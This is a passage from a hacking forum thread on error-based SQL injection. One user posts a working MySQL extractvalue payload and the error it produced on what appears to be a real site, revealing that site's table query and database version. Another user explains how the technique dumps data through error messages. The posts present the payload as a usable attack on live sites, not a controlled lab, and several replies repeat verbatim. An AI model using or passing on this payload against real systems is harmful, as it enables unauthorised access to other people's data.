Login Register






The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


Error-Based sql injection (a "new" approach) filter_list
Author
Message
RE: Error-Based sql injection (a "new" approach) #11
i found it
its code working fine

Code:
and extractvalue(null,concat(0x2a,(select version())))


An internal error has occured.
Code:
XPATH syntax error: '5.1.70-log'
Sql:SELECT COUNT(image_id) as count FROM southbay_showimages WHERE show_id=1 and extractvalue(null,concat(0x2a,(select version())))
mistakes are sometimes the best memories

Reply

RE: Error-Based sql injection (a "new" approach) #12
@EgyptGhost That's the idea here. You dump the data into the error message

Quote:XPATH syntax error: '5.1.70-log'
Here 5.1.70-log is the database version
"SQL Injection-a-holic"

Twitter | Security Sucks | My Blog

Reply

RE: Error-Based sql injection (a "new" approach) #13
@EgyptGhost That's the idea here. You dump the data into the error message

Quote:XPATH syntax error: '5.1.70-log'
Here 5.1.70-log is the database version
"SQL Injection-a-holic"

Twitter | Security Sucks | My Blog

Reply

RE: Error-Based sql injection (a "new" approach) #14
@EgyptGhost That's the idea here. You dump the data into the error message

Quote:XPATH syntax error: '5.1.70-log'
Here 5.1.70-log is the database version
"SQL Injection-a-holic"

Twitter | Security Sucks | My Blog

Reply

RE: Error-Based sql injection (a "new" approach) #15
(10-23-2013, 10:01 AM)shp0ngl3 Wrote: @EgyptGhost That's the idea here. You dump the data into the error message

Quote:XPATH syntax error: '5.1.70-log'
Here 5.1.70-log is the database version
i know i understand that now thanks man for idea Smile
mistakes are sometimes the best memories

Reply

RE: Error-Based sql injection (a "new" approach) #16
(10-23-2013, 10:01 AM)shp0ngl3 Wrote: @EgyptGhost That's the idea here. You dump the data into the error message

Quote:XPATH syntax error: '5.1.70-log'
Here 5.1.70-log is the database version
i know i understand that now thanks man for idea Smile
mistakes are sometimes the best memories

Reply

RE: Error-Based sql injection (a "new" approach) #17
(10-23-2013, 10:01 AM)shp0ngl3 Wrote: @EgyptGhost That's the idea here. You dump the data into the error message

Quote:XPATH syntax error: '5.1.70-log'
Here 5.1.70-log is the database version
i know i understand that now thanks man for idea Smile
mistakes are sometimes the best memories

Reply

RE: Error-Based sql injection (a "new" approach) #18
You're welcome Smile
"SQL Injection-a-holic"

Twitter | Security Sucks | My Blog

Reply

RE: Error-Based sql injection (a "new" approach) #19
You're welcome Smile
"SQL Injection-a-holic"

Twitter | Security Sucks | My Blog

Reply

RE: Error-Based sql injection (a "new" approach) #20
You're welcome Smile
"SQL Injection-a-holic"

Twitter | Security Sucks | My Blog

Reply







Users browsing this thread: 2 Guest(s)